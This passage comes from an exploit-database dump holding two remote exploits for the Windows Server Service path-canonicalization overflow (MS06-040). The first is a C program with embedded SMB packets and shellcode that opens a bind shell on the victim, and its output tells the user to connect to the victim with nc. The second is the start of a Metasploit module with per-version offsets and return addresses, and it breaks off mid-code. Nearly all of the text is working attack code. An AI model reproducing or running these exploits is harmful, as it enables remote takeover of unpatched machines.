0x33, \r\n0x52, 0x66, 0x79 };\r\n\r\nchar peer0_9[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, \r\n0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, \r\n0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, \r\n0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, \r\n0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, \r\n0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, \r\n0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, \r\n0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, \r\n0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, \r\n0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, \r\n0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, \r\n0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, \r\n0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, \r\n0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, \r\n0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, \r\n0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, \r\n0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, \r\n0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, \r\n0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, \r\n0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, \r\n0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, \r\n0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, \r\n0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, \r\n0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, \r\n0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, \r\n0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, \r\n0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, \r\n0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, \r\n0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, \r\n0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, \r\n0x00, 0x00, 0x00 };\r\n\r\nchar peer0_10[] = {\r\n0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, \r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, \r\n0x00, 0x00 };\r\n\r\nchar peer0_11[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, \r\n0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, \r\n0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, \r\n0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, \r\n0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, \r\n0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, \r\n0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, \r\n0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, \r\n0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, \r\n0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, \r\n0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, \r\n0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, \r\n0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, \r\n0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, \r\n0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, \r\n0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, \r\n0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, \r\n0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, \r\n0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, \r\n0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, \r\n0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, \r\n0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, \r\n0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, \r\n0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, \r\n0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, \r\n0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, \r\n0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, \r\n0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, \r\n0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, \r\n0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, \r\n0x7c, 0x45, 0x8e };\r\n\r\nchar peer0_12[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, \r\n0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, \r\n0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, \r\n0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, \r\n0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, \r\n0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, \r\n0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, \r\n0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, \r\n0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, \r\n0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, \r\n0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, \r\n0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, \r\n0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, \r\n0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, \r\n0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, \r\n0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, \r\n0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, \r\n0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, \r\n0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, \r\n0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, \r\n0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, \r\n0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, \r\n0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, \r\n0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, \r\n0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, \r\n0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, \r\n0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, \r\n0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, \r\n0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, \r\n0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, \r\n0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, \r\n0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, \r\n0x52, 0x66, 0x79 };\r\n\r\nchar peer0_13[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, \r\n0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, \r\n0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, \r\n0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, \r\n0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, \r\n0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, \r\n0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, \r\n0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, \r\n0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, \r\n0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, \r\n0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, \r\n0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, \r\n0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, \r\n0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, \r\n0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, \r\n0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, \r\n0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, \r\n0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, \r\n0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, \r\n0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, \r\n0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, \r\n0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, \r\n0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, \r\n0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, \r\n0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, \r\n0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, \r\n0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, \r\n0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, \r\n0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, \r\n0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, \r\n0x00, 0x00, 0x00 };\r\n\r\nchar peer0_14[] = {\r\n0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, \r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, \r\n0x00, 0x00 };\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\nint fd;\r\nint con;\r\nint repbf[20000];\r\n\r\nstruct sockaddr_in target;\r\n\r\n\r\nif(argc < 2)\r\n{\r\n\r\nprintf(\"Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\\n\");\r\nprintf(\"Tested on WindowsXP SP1 EN and got a bindshell on port 54321\\n\");\r\nprintf(\"Win2k should give a crash in services.exe\\n\");\r\nprintf(\"I've used the default smbdomain: WORKGROUP\\n\\n\");\r\nprintf(\"Usage: %s <ip>\\n\",argv[0]);\r\nprintf(\"Example: %s 192.168.1.103\\n\\n\",argv[0]);\r\nprintf(\"Written by: Preddy\\n\");\r\nprintf(\"RootShell Security Group\\n\");\r\nprintf(\"www.team-rootshell.com\\n\");\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nfd = socket(AF_INET,SOCK_STREAM,0);\r\n\r\nif(fd < 0)\r\n{\r\n\r\nperror(\"Could not create socket\\n\");\r\nexit(1);\r\n}\r\n\r\nprintf(\"Target: %s\\n\",argv[1]);\r\n\r\ntarget.sin_family = AF_INET;\r\ntarget.sin_addr.s_addr = inet_addr(argv[1]);\r\ntarget.sin_port = htons(PORT);\r\n\r\ncon = connect(fd,(struct sockaddr_in *)&target,sizeof(target));\r\n\r\nif(con < 0)\r\n{\r\n\r\nprintf(\"Could not connect\\n\");\r\nexit(1);\r\n}\r\n\r\nsendto(fd,peer0_0,sizeof(peer0_0),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_1,sizeof(peer0_1),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_2,sizeof(peer0_2),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_3,sizeof(peer0_3),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_4,sizeof(peer0_4),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_5,sizeof(peer0_5),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_6,sizeof(peer0_6),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_7,sizeof(peer0_7),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_8,sizeof(peer0_8),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_9,sizeof(peer0_9),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_10,sizeof(peer0_10),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_11,sizeof(peer0_11),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_12,sizeof(peer0_12),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_13,sizeof(peer0_13),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_14,sizeof(peer0_14),0,&target,sizeof(target));\r\n\r\nprintf(\"Attack Finished: now open a new terminal and nc to your victim on port 54321\\n\");\r\nprintf(\"Warning: Don't close this window!\\n\");\r\n\r\nread(fd,repbf,sizeof(repbf));\r\n\r\nprintf(\"Done..\\n\");\r\n\r\nclose(fd);\r\n\r\n}\r\n\r\n// milw0rm.com [2006-08-19]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2223/"}, {"lastseen": "2016-02-01T23:42:35", "bulletinFamily": "exploit", "description": "Microsoft Server Service NetpwPathCanonicalize Overflow. CVE-2006-3439. Remote exploit for windows platform", "modified": "2011-02-17T00:00:00", "published": "2011-02-17T00:00:00", "id": "EDB-ID:16367", "href": "https://www.exploit-db.com/exploits/16367/", "type": "exploitdb", "title": "Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "##\r\n# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Server Service NetpwPathCanonicalize Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\r\n\t\t\t\tusing the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\r\n\t\t\t\tother RPC calls could be used to exploit this service. This exploit will result in\r\n\t\t\t\ta denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\r\n\t\t\t\twill likely result in a complete reboot on Windows 2000 and the termination of all\r\n\t\t\t\tSMB-related services on Windows XP. The default target for this exploit should succeed\r\n\t\t\t\ton Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm'\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11762 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-3439' ],\r\n\t\t\t\t\t[ 'OSVDB', '27845' ],\r\n\t\t\t\t\t[ 'BID', '19409' ],\r\n\t\t\t\t\t[ 'MSB', 'MS06-040' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# Technically we can use more space than this, but by limiting it\r\n\t\t\t\t\t# to 370 bytes we can use the same request for all Windows SPs.\r\n\t\t\t\t\t'Space' => 370,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],\r\n\t\t\t\t\t[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1000,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(wcscpy) Windows XP SP0/SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 612,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(stack) Windows XP SP1 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'OffsetA' => 656,\r\n\t\t\t\t\t\t\t'OffsetB' => 680,\r\n\t\t\t\t\t\t\t'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(stack) Windows XP SP1 Italian',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'OffsetA' => 656,\r\n\t\t\t\t\t\t\t'OffsetB' => 680,\r\n\t\t\t\t\t\t\t'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ '(wcscpy) Windows 2003 SP0',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 612,\r\n\t\t\t\t\t\t\t'Ret' => 0x00020804\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DisclosureDate' => 'Aug 8 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect()\r\n\t\tsmb_login()\r\n\r\n\t\tmytarget = target\r\n\t\tif (not target) or (target.name =~ /Automatic/)\r\n\t\t\tcase smb_peer_os()\r\n\t\t\t\twhen 'Windows 5.0'\r\n\t\t\t\t\tprint_status(\"Detected a Windows 2000 target\")\r\n\t\t\t\t\tmytarget = targets[1]\r\n\r\n\t\t\t\twhen 'Windows NT 4.0'\r\n\t\t\t\t\tprint_status(\"Detected a Windows NT 4.0 target\")\r\n\t\t\t\t\tmytarget = targets[1]\r\n\r\n\t\t\t\twhen 'Windows 5.1'\r\n\t\t\t\t\tbegin\r\n\t\t\t\t\t\tsmb_create(\"\\\\SRVSVC\")\r\n\t\t\t\t\t\tprint_status(\"Detected a Windows XP SP0/SP1 target\")\r\n\t\t\t\t\trescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\r\n\t\t\t\t\t\tif (e.error_code == 0xc0000022)\r\n\t\t\t\t\t\t\tprint_status(\"Windows XP SP2 is not exploitable\")\r\n\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tprint_status(\"Detected a Windows XP target (unknown patch level)\")\r\n\t\t\t\t\tend\r\n\t\t\t\t\tmytarget = targets[2]\r\n\r\n\t\t\t\twhen /Windows Server 2003 (\\d+)$/\r\n\t\t\t\t\tprint_status(\"Detected a Windows 2003 SP0 target\")\r\n\t\t\t\t\tmytarget = targets[5]\r\n\r\n\t\t\t\twhen /Windows Server 2003 (\\d+) Service Pack (\\d+)/\r\n\t\t\t\t\tprint_status(\"Windows 2003 SP#{$2} is not exploitable\")\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\twhen /Samba/\r\n\t\t\t\t\tprint_status(\"Samba is not vulnerable\")\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\telse\r\n\t\t\t\t\tprint_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\")\r\n\t\t\t\t\treturn\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Specific fixups for Windows NT\r\n\t\tcase smb_peer_os()\r\n\t\twhen 'Windows NT 4.0'\r\n\t\t\tprint_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\")\r\n\t\t\tdatastore['SMB::pipe_write_min_size'] = 2048\r\n\t\t\tdatastore['SMB::pipe_write_max_size'] = 4096\r\n\t\tend\r\n\r\n\t\thandle = dcerpc_handle(\r\n\t\t\t'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\r\n\t\t\t'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\r\n\t\t)\r\n\r\n\t\tprint_status(\"Binding to #{handle} 